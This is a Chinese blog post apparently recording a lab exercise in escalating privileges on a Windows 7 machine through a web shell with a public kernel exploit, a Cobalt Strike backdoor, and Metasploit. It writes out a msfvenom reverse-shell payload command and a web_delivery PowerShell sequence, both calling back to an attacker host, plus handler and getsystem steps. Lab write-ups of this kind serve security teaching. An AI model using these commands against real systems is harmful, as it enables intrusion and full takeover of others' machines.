window.cnblogsConfig = { webpageTitleOnblur: '404-页面丢失', } window.cnblogsConfig = { webpageTitleOnblurTimeOut: 500, }

Windows三种内核提权实验

以win7为例

手动提权

上线

将一句话木马上传到win7当中,本地使用蚁剑进行链接。

image-20241113200659935

信息收集

systeminfo

image-20241113200745078

查询杀软信息

wmic process list brief

Windows杀软在线查询

image-20241113201233029

无匹配杀软进程。

根据系统信息和杀软信息查询提权EXP

Windows 提权辅助 | 在线安全工具

image-20241113201627245

以列出的微软编号MS17-017为例

GitHub - SecWiki/windows-kernel-exploits: windows-kernel-exploits Windows平台提权漏洞集合

找到对应EXP进行下载。利用蚁剑将EXP上传到win7。

image-20241113205134799

启动EXP:

image-20241113205146489

CS半自动化提权

通过cs生成一个后门,将后门上传至目标系统中,再使用cs上安装的各类插件进行半自动化提权。

上线

image-20241113211349474

image-20241113211744314

利用插件提权

image-20241113213648569

image-20241113213808096

MSF自动提权

监听

生成木马

在kali中生成一个木马,上传至win7

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.128 LPORT=3333 -f exe -a x86_64 -o msf.exe
# LHOST=kali地址
# LPORT=自定义设置一个端口

将代码上传至win7运行

image-20241113221031798

image-20241113221045211

发现msf生成的上线马和此系统版本不兼容。

改为使用PowerShell代码上线的方式:

use exploit/multi/script/web_delivery 
set target 2
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.128
set lport 4444
run

生成PowerShell代码,将其复制到Win7上执行。

image-20241113222212176

image-20241113222619701

成功上线。

切换漏洞利用控制台:

use exploit/multi/handler 

image-20241114101531527

查看权限

getuid

image-20241114102056557

之后使用msf 的post模块提权或者直接用getsystem

image-20241114102600312

posted @ 2024-11-15 15:03  憂心如惔  阅读(19)  评论(0编辑  收藏  举报